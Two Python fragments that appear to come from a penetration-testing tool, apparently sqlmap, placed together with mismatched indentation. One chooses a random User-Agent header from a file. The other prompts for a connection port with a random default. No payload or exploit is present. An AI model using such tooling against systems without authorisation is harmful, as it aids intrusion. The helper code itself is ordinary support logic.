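    if __count == 0:
        warnMsg  = "HTTP User-Agent header file '%s' " % conf.userAgentsFile
        warnMsg += "contains no entries, using default"
        logger.warn(warnMsg)

        conf.httpHeaders.append(("User-Agent", __defaultHTTPUserAgent()))

        return

    if __count == 1:
        __userAgent = __userAgents[0]
    else:
        # randomRange() is inclusive at both ends (its other call sites use
        # ``len(...) - 1``), so ``stop=__count`` could index past the list.
        __userAgent = __userAgents[randomRange(stop=__count - 1)]

    __userAgent = sanitizeStr(__userAgent)
    conf.httpHeaders.append(("User-Agent", __userAgent))

    logMsg  = "fetched random HTTP User-Agent header from "
    logMsg += "file '%s': %s" % (conf.userAgentsFile, __userAgent)
    logger.info(logMsg)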
 def _selectPort(self):
     """
     Prompt for the port of the connection type that prefixes ``self.connectionStr``.

     The first entry of ``self._portData`` whose key is a prefix of the
     connection string is handed to ``_skeletonSelection`` with a 65535 cap
     and a random default in 1025..65535; its result is returned. Nothing
     matching yields None.
     """
     candidates = [connStr for connType, connStr in self._portData.items()
                   if self.connectionStr.startswith(connType)]

     if not candidates:
         return None

     return self._skeletonSelection(candidates[0], maxValue=65535, default=randomRange(1025, 65535))